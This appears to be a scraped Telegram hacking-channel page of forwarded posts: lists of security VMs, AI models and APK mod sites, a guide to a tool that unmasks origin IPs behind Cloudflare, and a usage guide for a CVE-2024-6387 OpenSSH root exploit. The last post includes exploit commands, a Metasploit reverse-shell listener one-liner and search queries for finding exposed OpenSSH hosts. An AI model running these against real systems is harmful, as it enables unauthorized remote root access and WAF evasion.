UNDERCODE COMMUNITY
2.69K subscribers
1.24K photos
31 videos
2.65K files
81K links
🦑 Undercode World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE


Youtube.com/Undercode
by Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Forwarded from Exploiting Crew (Pr1vAt3)
𝐓𝐎𝐏 𝟐𝟎 𝐕𝐈𝐑𝐓𝐔𝐀𝐋 𝐌𝐀𝐂𝐇𝐈𝐍𝐄𝐒 𝐅𝐎𝐑 𝐂𝐘𝐁𝐄𝐑𝐒𝐄𝐂𝐔𝐑𝐈𝐓𝐘 𝐏𝐑𝐎𝐅𝐄𝐒𝐒𝐈𝐎𝐍𝐀𝐋𝐒

ℹ️ Here’s a comprehensive list of top VMs tailored for various cybersecurity domains, from Pentesting and Red Teaming to Digital Forensics and Privacy:

💿 Predator-OS (Pentesting):
https://predator-os.ir/

💿 BlackArch Linux (Pentesting):
https://lnkd.in/dQuQV4SK

💿 BackBox (Pentesting):
https://www.backbox.org/

💿 Kookarai (Pentesting):
https://lnkd.in/d-4ckJ97

💿 Parrot Security OS (Red and Blue Team operation):
https://parrotsec.org/

💿 Commando VM (Windows-based Pentesting/Red Teaming):
https://lnkd.in/dec8_V3B

💿 Whonix (Privacy and Anonymity):
https://lnkd.in/dpWagU2f

💿 Tails (Privacy and Anonymity):
https://tails.net/

💿 Qubes OS (Hypervisor):
https://www.qubes-os.org/

💿 Mandiant Threat Pursuit (Windows-based Threat Intelligence and Hunting):
https://lnkd.in/d-N4Dt9x

💿 Tsurugi Linux (Digital Forensics and OSINT):
https://lnkd.in/dsr-ekeB

💿 SIFT Workstation (Digital Forensics):
https://lnkd.in/dmnZRNNP

💿 CSI Linux (Digital Forensics):
https://csilinux.com/

💿 CAINE (Digital Forensics):
https://lnkd.in/dYn9b7Hs

💿 RedHunt Labs-OS Linux (Adversary Emulation and Threat Hunting):
https://lnkd.in/db5sd6h3

💿 FLARE-VM (Reverse Engineering):
https://lnkd.in/ds9s4Wdz

💿 REMnux (Reverse Engineering/Malware Analysis):
https://remnux.org/

💿 Trace Labs OSINT VM (OSINT to Find Missing Persons):
https://lnkd.in/dsymX2KG

💿 Security Onion Solutions, LLC (Threat Hunting, Network Security Monitoring, and Log Management):
https://lnkd.in/d4r6myav
Forwarded from UNDERCODE TESTING
Complete Chart of Neural Networks
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Cloudflare Bypass:

CrimeFlare - Bypass Cloudflare WAF and Reveal Real IPs

CrimeFlare is a PHP-based tool designed to identify the original IP address of websites protected by Cloudflare's Web Application Firewall (WAF). This information can be valuable for penetration testing and deeper analysis of websites that rely on Cloudflare for anonymity and security.

---

Features:
1. Cloudflare Information:
- Cloudflare-protected IPs.
- Cloudflare NS1 and NS2 details.
2. Real IP Revelation:
- Unmasks the original IP behind Cloudflare protection.
3. Additional Metadata:
- Hostname.
- Organization.
- Location details (Country, City, Region, Postal Code, Time Zone).

---

Disclaimer:
The tool is for educational and lawful penetration testing purposes only. Misuse of CrimeFlare for unauthorized access or malicious activities is illegal and unethical.

---

Installation:

#### Prerequisites:
1. PHP and php-curl must be installed.
Install on Ubuntu:

   sudo apt install php php-curl

#### Clone the Repository:
git clone https://github.com/zidansec/CloudPeler.git
cd CloudPeler

#### Run the Script:
To reveal the real IP behind a domain:
php crimeflare.php example.com

#### Easy Installation:
For quick execution from anywhere on Linux:
sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare

Now you can run CrimeFlare with:
crimeflare example.com

---

### API Sources:
1. CrimeFlare API: [https://crimeflare.zidansec.com](https://crimeflare.zidansec.com)
2. IPInfo API: [http://ipinfo.io](http://ipinfo.io/2.2.2.2/json)

---

### Code Example:
CrimeFlare uses simple PHP scripting with APIs to gather and process data. The script sends HTTP requests to API endpoints and processes JSON responses to display the original IP and related metadata.

---

### Additional OSINT Tool:
OsintSec:
A tool for visualizing networks from domains, IPs, and emails.
[OsintSec Tool](https://osinthreat.herokuapp.com/)

---

### Quick Commands:
- Clone repository:

  git clone https://github.com/zidansec/CloudPeler.git

- Execute the script:

  php crimeflare.php example.com

- Install for system-wide access:

  sudo wget https://github.com/zidansec/CloudPeler/raw/master/crimeflare.php -O /bin/crimeflare
sudo chmod +x /bin/crimeflare

- Run directly:

  crimeflare example.com

---

### GitHub Repository:
Access the archived repository for full documentation and source code:
[CrimeFlare GitHub Repository](https://github.com/zidansec/CloudPeler)
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Largest and most advanced AI models available on Hugging Face in 2024:

1. DeepSeek LLM 67B Base
- Parameters: 67 billion
- Highlights: Exceptional at reasoning, coding, and mathematics, surpassing GPT-3.5 and Llama2-70B.
- Official URL: [DeepSeek LLM 67B Base on Hugging Face](https://huggingface.co/models).

2. Yi-34B-Llama
- Parameters: 34 billion
- Highlights: Multi-modal processing for text, code, and images, with zero-shot learning capabilities.
- Official URL: [Yi-34B-Llama on Hugging Face](https://huggingface.co/models).

3. Qwen/Qwen2.5-72B-Instruct
- Parameters: 72 billion
- Highlights: Advanced role-playing, long text generation, and structured data understanding.
- Official URL: [Qwen2.5-72B-Instruct](https://huggingface.co/Qwen/Qwen2.5-72B-Instruct).

4. Llama 3.3-70B-Instruct
- Parameters: 70 billion
- Highlights: Ideal for daily use with highly capable instruction-following capabilities.
- Official URL: [Llama 3.3-70B-Instruct](https://huggingface.co/meta-llama/Llama-3.3-70B-Instruct).

5. Nyxene-v2-11B
- Parameters: 11 billion
- Highlights: Efficient processing and high fluency in text generation and question answering.
- Official URL: [Nyxene-v2-11B](https://huggingface.co/models).

For a comprehensive list of models and their detailed capabilities, visit [Hugging Face's model hub](https://huggingface.co/models).
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Best apk mod websites:

1 apkmody https://apkmody.io ✔️
2 modcombo https://modcombo.com ✔️
3 happymod https://happymod.com ✔️
4 modyolo https://modyolo.com ✔️
5 luckymodapk https://www.luckymodapk.com ✔️
6 an1 https://an1.com ✔️
7 getmodsapk https://getmodsapk.com ✔️
8 moddroid https://moddroid.co ✔️
9 modded-1 https://modded-1.com ✔️
10 techbigs https://techbigs.com ✔️
11 apktodo https://apktodo.com ✔️
12 m.playmods https://m.playmods.net ✔️
13 modradar https://modradar.net ✔️
14 apkmodule https://apkmodule.com ✔️
15 modhello https://modhello.com ✔️
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Exploit The 2024 OpenSSH sshd:

A critical vulnerability identified as CVE-2024-6387 affects OpenSSH sshd and allows remote unauthenticated attackers to execute arbitrary code as root due to a signal handler race condition. Below is a comprehensive breakdown of this flaw, usage instructions for associated tools, and mitigation strategies.

🔍 Vulnerability Overview
- **Discovered by
: Researchers at Qualys in May 2024.
- Root Cause:
A race condition triggered in the SIGALRM handler of sshd when a client fails to authenticate within the LoginGraceTime (default 120 seconds). This handler invokes functions that are not asynchronous-signal-safe, creating a window for exploitation.
- Impact:
- Allows unauthenticated attackers to gain root privileges remotely.
- Exploits the default LoginGraceTime settings.


🌟 Features of Exploitation Tool
1. Rapid Scanning: Scans multiple IPs, domains, or CIDR ranges for this vulnerability.
2. Version Detection: Identifies OpenSSH versions and checks for patched systems.
3. Banner Retrieval: Fetches SSH banners for identification without authentication.
4. Multi-threading: Increases efficiency and exploit chances using concurrent threads.
5. Customizable Outputs: Saves results in formats like JSON, CSV, or plain text.
6. Port Scanning: Detects open/closed ports and highlights non-responsive hosts.
7. IPv6 Support: Fully compatible with IPv6 scanning.

---

⚙️ Usage Instructions
#### Prerequisites
- Ensure Python 3.x is installed.
- Install dependencies (if required):
  pip install -r requirements.txt


#### Basic Commands
- Scan a Target:
  python3 CVE-2024-6387.py scan -T example.com -p 22

- Exploit a Target:
  python3 CVE-2024-6387.py exploit -T example.com -p 22 -n eth0


#### Advanced Options
| Argument | Description | Default |
|-----------------------|--------------------------------------------------------------|--------------|
| -T, --targets | IP, domain, file path, or CIDR range to scan. | N/A |
| -p, --port | SSH port to target. | 22 |
| -s, --speed | Threads for scanning/exploitation. | 10 |
| -t, --timeout | Connection timeout in seconds. | 1 |
| -o, --output | Output format (csv, txt, json). | json |
| -g, --gracetimecheck| Check for LoginGraceTime mitigation (seconds). | 120 |

---

### Escalation Process
#### Setting Up Payload Listener
Before exploiting, set up a reverse shell listener:
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"


#### Exploitation Example
Run the exploit tool with the configured settings:
python3 CVE-2024-6387.py exploit -T target.com -p 22 -n eth0


---

### 🔍 Host Discovery
#### OSINT Techniques
- Hunter: /product.name="OpenSSH"
- FOFA: app="OpenSSH"
- SHODAN: product:"OpenSSH"
- CENSYS: (openssh) and labels=remote-access

---

### 🛡 Mitigation Strategies
1. Patch Management
- Upgrade to the latest patched version of OpenSSH to close this vulnerability.

2. Limit Access
- Restrict SSH access to trusted IPs/networks using firewalls or VPNs.

3. Enable Monitoring
- Use IDS/IPS tools to detect and prevent exploitation attempts.

4. Network Segmentation
- Isolate critical systems to reduce lateral movement risks in case of compromise.

5. Log Analysis
- Continuously monitor logs for unusual SSH activities or patterns.

Color-Coded Output
- 🟢 Green: Successful connection or exploit.
- 🔴 Red: Failed connection or error.
- 🟡 Yellow: Warnings or notable information.
- 🔵 Cyan: General updates or information.

Full on: https://github.com/asterictnl-lvdw/CVE-2024-6387